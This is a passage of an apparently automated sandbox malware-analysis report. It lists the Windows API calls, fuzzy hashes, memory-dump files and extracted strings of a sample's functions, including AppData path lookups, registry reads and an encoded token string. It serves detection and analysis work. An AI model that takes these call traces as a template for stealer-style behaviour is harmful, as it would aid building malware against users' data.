                            • RegCloseKey.ADVAPI32(?), ref: 00B231B1
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 57364cf12724fbf127d7c9639e2a903e8ece3ecbd51dc48662de52fd09df2a86
                            • Instruction ID: 2ee6e4a27b8688c0d7c5eb7e244b38809d9489129a9857a038d811fc445b492c
                            • Opcode Fuzzy Hash: 57364cf12724fbf127d7c9639e2a903e8ece3ecbd51dc48662de52fd09df2a86
                            • Instruction Fuzzy Hash: 71116072A04319AFD714CB94EC45BABB7BCEB44B11F004159FA09E2380DB7459048BB1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 3b6eb00fc3f23b74780259b038c6c903266502577f34cd00c4c0d91e1bd1363e
                            • Instruction ID: 59d649573d5a4a18e6facf63da0bdf8a0403bc4d8508b48cb0a52d557ddbab5a
                            • Opcode Fuzzy Hash: 3b6eb00fc3f23b74780259b038c6c903266502577f34cd00c4c0d91e1bd1363e
                            • Instruction Fuzzy Hash: EF41277050076CAEDB318B259C89FFB7BFCDB45304F1444E8E98E96182E2719A458F20
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B08996
                              • Part of subcall function 00B2A1C0: std::exception::exception.LIBCMT ref: 00B2A1D5
                              • Part of subcall function 00B2A1C0: std::exception::exception.LIBCMT ref: 00B2A1FB
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B089CD
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A188
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: f7be382d19263cfb8f964ec6543c445c973d6ac7071bba7e89e61d07512a610b
                            • Instruction ID: 1aba02ac24e5f43be521363236fcd87ff258ee31a4112af368e44e36cbb20028
                            • Opcode Fuzzy Hash: f7be382d19263cfb8f964ec6543c445c973d6ac7071bba7e89e61d07512a610b
                            • Instruction Fuzzy Hash: BB21D6723006508BC720AA5CE840A6AFBD9DBA17A1B2109BFF1C1CB6C1CB71DD41C7E5
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B08883
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A188
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: c808d6020eeadee6f3f03054875d635e024792b18ec18d2511e2e0145988b61b
                            • Instruction ID: ceb65903597c6084bf348b7bbf8aa5228360ff368155715124b9f906a04badce
                            • Opcode Fuzzy Hash: c808d6020eeadee6f3f03054875d635e024792b18ec18d2511e2e0145988b61b
                            • Instruction Fuzzy Hash: 3D3197B5E005159BCB08DF58C8916ADBBF6EB88350F148269E915AF384DB30AE01CB91
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B25922
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A188
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A1AE
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B25935
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: d384735ca909e1e1ee729a32f7dc28062e7e4fdead5b3ec332572b16661683f9
                            • Instruction ID: ffbe27d33fa7f5ee2f871ae3d11308d4ce1002437ebd3ac49d518a571a552926
                            • Opcode Fuzzy Hash: d384735ca909e1e1ee729a32f7dc28062e7e4fdead5b3ec332572b16661683f9
                            • Instruction Fuzzy Hash: F9117C30304B60CBD7318B2CF840B1AB7E5EBD2761F250ADAE0D987695D771E881C7A1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00B2A430,000000FF), ref: 00B23D20
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B23D27
                            • wsprintfA.USER32 ref: 00B23D37
                              • Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 32d40c101e89f8058d4a0694848706652b98f8856614f6803f905a85036e7c4c
                            • Instruction ID: 599e538c9fc241693d0989f455455d654e4286b44ea3087025e0830b4e3e021a
                            • Opcode Fuzzy Hash: 32d40c101e89f8058d4a0694848706652b98f8856614f6803f905a85036e7c4c
                            • Instruction Fuzzy Hash: 5A018071644714BBE7245B54EC4AF6ABBB8FB45B62F100155FA05D73D0DBB41900C6B1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B08737
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A188
                              • Part of subcall function 00B2A173: std::exception::exception.LIBCMT ref: 00B2A1AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 68a9a1dbe7c589167dfd200d710b1757b786c28fc70e6cad5abf7b3408a80385
                            • Instruction ID: 52a3ec485523bfedbf834ba785b750ad789cab6e8dd0e60cfc7c664edc5567d4
                            • Opcode Fuzzy Hash: 68a9a1dbe7c589167dfd200d710b1757b786c28fc70e6cad5abf7b3408a80385
                            • Instruction Fuzzy Hash: 6FF09027B040310FC314643D9D8445EAD8697E539033AD7A5E99AEF29DEC70ED8285D5
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1E544
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E573
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E581
                            • lstrcat.KERNEL32(?,0187DB90), ref: 00B1E59C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 116faa1c0134d3edc3b1f6e03ec212910ffc061a3a7b5166d1e1f1c996ed4f4d
                            • Instruction ID: 46cc2cf0a9fedd03dfd09ac2ff7a386ee8b07e787fa97f13645997be6b3909f0
                            • Opcode Fuzzy Hash: 116faa1c0134d3edc3b1f6e03ec212910ffc061a3a7b5166d1e1f1c996ed4f4d
                            • Instruction Fuzzy Hash: DE51A875A10208ABC755EB58DC46EEE77F9FB48300F4444E8B919D7391DF70AE898BA0
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00B21FDF, 00B21FF5, 00B220B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: 1da144425978314b5a0c44483d0c7765ebfa1e83ca74bf6c93c1703db641679a
                            • Instruction ID: 0457c469379e88f8816f1736d70cc15a6bb23b0b5b8438792a27b3bd171aa55b
                            • Opcode Fuzzy Hash: 1da144425978314b5a0c44483d0c7765ebfa1e83ca74bf6c93c1703db641679a
                            • Instruction Fuzzy Hash: 07215A39510199AEDB20EB35E4846EEF3E7EF84761F9440D6C81C8B251E336290AD796
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1EBB4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1EBE3
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1EBF1
                            • lstrcat.KERNEL32(?,0187EE40), ref: 00B1EC0C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 1a4775e6c672c3af15aa08c8b57b35605525daf19ee6012f452bc0d3390504b0
                            • Instruction ID: d7cd09605a65f21f620e57c2c0eac536c77866905dddab9e1161ff44377c5664
                            • Opcode Fuzzy Hash: 1a4775e6c672c3af15aa08c8b57b35605525daf19ee6012f452bc0d3390504b0
                            • Instruction Fuzzy Hash: 36315271A102189BCB25EB68DC45BEE77F4AF48300F1044F8BA16D7291DE709E888BA0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00B2A3D0,000000FF), ref: 00B22B8F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B22B96
                            • GetLocalTime.KERNEL32(?,?,00000000,00B2A3D0,000000FF), ref: 00B22BA2
                            • wsprintfA.USER32 ref: 00B22BCE
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
